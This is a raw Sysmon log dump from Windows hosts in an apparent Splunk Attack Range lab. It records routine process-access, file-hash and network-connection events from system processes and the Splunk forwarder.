08:05:28.366{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809997Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:05:28.366{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809996Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:28.366{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809995Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:05:28.366{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809994Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:28.366{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809993Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:05:28.366{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809992Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:28.366{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F7C8-60EB-D479-00000000D001}2296C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809991Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:28.366{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F7C8-60EB-D479-00000000D001}2296C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809990Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:28.351{0C1E0330-F7C8-60EB-D479-00000000D001}2296C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809989Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:28.054{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2101DD81E1BA3F8EEA65A00E808BDBD6,SHA256=BC3E0B97296ABB76BC6A97F68B69DD3058C2E9F6C827852E5AA18CA164EA1763,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810006Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:29.788{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3257B0C8EC4B802996D6865A1EF5C696,SHA256=6E37405EB6AC416B4EB61B87CAD5153F6DAD23EB1B485D71689035C2BCD11461,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053693Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:29.146{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0006989076ABB6EAFAC80A652637D158,SHA256=1A028775B99463D1E2392D074ADC4C57CBBADCD9102D617ABDC73C34A07F8157,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810005Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:29.366{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BBD2B3EB4DE8C3D614FF9577A73E6F87,SHA256=7921693501B58877B124DEAA2B417031B0EA10150D67A9C3168AED29E4DC370A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810008Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:30.804{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C7E210E675AD42BC9974A93D573F4B6,SHA256=BC6A573E8AC32CC6BFC559B633705DFECA52C2D1DD845B7C47B839BFDD0844BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053695Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:30.147{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC6A9C2DB2B544FF2F831F9503D216AD,SHA256=A749423480393EC1913BB90B3111BC716614869DE5C735B109931A5B7DB05AB1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810007Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:30.194{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=4F8959D7E80A5FD9BCB59E4FA3B4E239,SHA256=62EBE1BFC1D93C89A2A1B37E8B189C9E4207AA16BBD69C1F8FFB3525619D4CDB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053694Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.754{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61936-false10.0.1.12-8000- 354300x8000000000000000810010Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:30.296{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57434-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810009Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:31.804{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2817DCAA8105152BD65FB4667960882E,SHA256=13E9FD1F000D7E6E23ED7433EDC28BD1A3A21238013225671AE41912A62269A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053696Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:31.177{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5D53D9A0E7D056A535DD24179CEEDC7,SHA256=317398A21F3B30A6501732AD7887C3111D6E56362AD432D133F9C03EAEBBAF65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810011Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:32.804{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CDFC836181801BE110B448D539A7345,SHA256=6513D9D7E3FEFABFE23BA904AE4A99679AF4DA602B2380279916E406DD35D155,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053697Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:32.177{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A7DB717FD0C37EFCBA2F3E8AA4D57AB,SHA256=F619E04DBF728ED2B7992DE8DC372780032056CB2D18780145DA6551615F5DAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810012Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:33.835{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=377A5F15B7F37B559D0DAED8773A6689,SHA256=11728B074C1314978048235EFBC5EC6A7F81B013E564EB38F201EDACD0CED915,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053698Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:33.207{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF4F8740311904D5C238E2AAA05F1C21,SHA256=D12E80C7EDED1530FF911E686A97FBE8936D3C8B08522753E72B5900C0432751,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810013Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:34.839{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E722DA5AE12D00946866480FAC0145D,SHA256=7206364766CEA4CB3DAF5C05708416CB4868F00BAE4109C472EBCDDE431C1292,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053737Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.644{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83DF2F69B85B650EF0BA9CACD099D681,SHA256=67D8EB4C792390DE525EE5A6EBF0CB03726EC2217F33CEA95172F55B6D00B2F4,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000001053736Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.591{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053735Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:34.591{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\execmodelclient.dll+8e62|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001053734Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:34.591{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053733Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:34.591{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\execmodelclient.dll+8d5e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001053732Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.575{466BC892-32D3-60E8-770B-00000000CF01}6356764C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001053731Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.575{466BC892-32D3-60E8-770B-00000000CF01}6356764C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053730Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.575{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.d
